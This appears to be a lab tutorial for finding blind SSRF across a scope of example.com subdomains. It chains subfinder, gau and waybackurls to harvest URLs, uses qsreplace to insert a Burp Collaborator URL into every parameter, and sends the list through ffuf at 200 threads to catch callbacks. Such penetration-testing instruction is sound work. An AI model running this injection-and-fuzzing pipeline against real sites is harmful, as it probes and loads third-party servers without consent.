Finding SSRF (all scope)
The goal of this lab is to use a few command-line tools to collect all subdomains of a target domain, gather their known URLs and parameters, and then detect blind SSRF by watching for callbacks in the Burp Collaborator utility.

Tools

subfinder: Subdomain discovery.
How to install it:
GO111MODULE=on go get -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder
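For example, a quick standalone run against the lab scope could look like this (the output file name subs.txt is just an example):
# enumerate subdomains quietly and write them to a file
subfinder -d example.com -silent -o subs.txt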
qsreplace: Accept URLs on stdin, replace all query string values with a user-supplied value.
How to install it:
go get -u github.com/tomnomnom/qsreplace
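A small sketch of what it does (the URL and parameter values below are made up):
# every query string value in the piped URL is swapped for the supplied payload
echo "https://sub.example.com/page?id=1&ref=abc" | qsreplace "http://xxxxxxxxxxx.burpcollaborator.net"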
gau: Fetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl.
How to install it:
GO111MODULE=on go get -u -v github.com/lc/gau
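A typical single-domain run might look like the following; note that newer gau releases spell the subdomain flag as --subs, and gau_urls.txt is just an example file name:
# pull known URLs for the domain and its subdomains from OTX, Wayback and Common Crawl
gau -subs example.com > gau_urls.txt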
waybackurls: Fetch all the URLs that the Wayback Machine knows about for a domain.
How to install it:
go get github.com/tomnomnom/waybackurls
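It reads domains on stdin, so a minimal sketch is:
# archived URLs for the domain, saved to an example file
echo example.com | waybackurls > wayback_urls.txt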
gf: A wrapper around grep, to help you grep for things.
How to install it:
go get -u github.com/tomnomnom/gf
Filters to drop static assets and keep only the URLs that contain the Collaborator payload:
grep -v "\.css?ver" | grep -v "\.js" | grep -v "\.png" | grep -v "\.woff" | grep "collaborator"
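gf itself is not used in the commands below, but one way it could fit in is to narrow the harvested URLs (output.txt from the Harvester step) down to likely SSRF candidates. This assumes an ssrf pattern file (for example from a community Gf-Patterns set) is installed under ~/.gf, and ssrf_candidates.txt is a hypothetical file name:
# keep only unique URLs whose parameters match the ssrf pattern
cat output.txt | gf ssrf | sort -u > ssrf_candidates.txt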
ffuf: Fast web fuzzer written in Go.
How to install it:
go get -u github.com/ffuf/ffuf

Scope

In Scope: *.example.com

Harvester

Collect URLs from gau and from the Wayback Machine (via subfinder's subdomains), deduplicate them, and save everything to output.txt:
(gau -subs example.com; subfinder -d example.com -silent | waybackurls) | sort -u > output.txt
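An optional intermediate step is to apply the static-asset filters from the exclusion list above to the harvested URLs; output_filtered.txt is a hypothetical name, and the later commands still read output.txt unless you substitute it:
# drop obvious static assets that are unlikely to be SSRF sinks
cat output.txt | grep -v "\.css?ver" | grep -v "\.js" | grep -v "\.png" | grep -v "\.woff" > output_filtered.txt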

Replacing params

cat output.txt | qsreplace "http://xxxxxxxxxxx.burpcollaborator.net" >> fuzz_list.txt
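Only URLs that actually carried a query string will contain the payload after qsreplace, so a hedged variant that also applies the final grep from the exclusion list and deduplicates could be:
# keep only unique URLs in which the Collaborator payload was injected
cat output.txt | qsreplace "http://xxxxxxxxxxx.burpcollaborator.net" | grep "collaborator" | sort -u > fuzz_list.txt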

Fuzzing and testing

ffuf -c -w fuzz_list.txt -u FUZZ -t 200 -r
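Here the wordlist is the list of full payloaded URLs, so FUZZ stands in for the entire target URL; -c colorizes the output, -t 200 runs 200 concurrent threads, and -r follows redirects. A variant that also records the responses (the output file name is just an example) could be:
# replay every payloaded URL, follow redirects, and save results as JSON
ffuf -c -w fuzz_list.txt -u FUZZ -t 200 -r -o ffuf_results.json -of json
After the run, check the Burp Collaborator client for DNS or HTTP interactions: any hit means a server fetched the injected URL, i.e. a likely SSRF.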

Resources

To collect all URLs from several sources:
GitHub - signedsecurity/sigurlfind3r: a passive reconnaissance tool for known URLs discovery; it gathers a list of URLs passively using various online sources.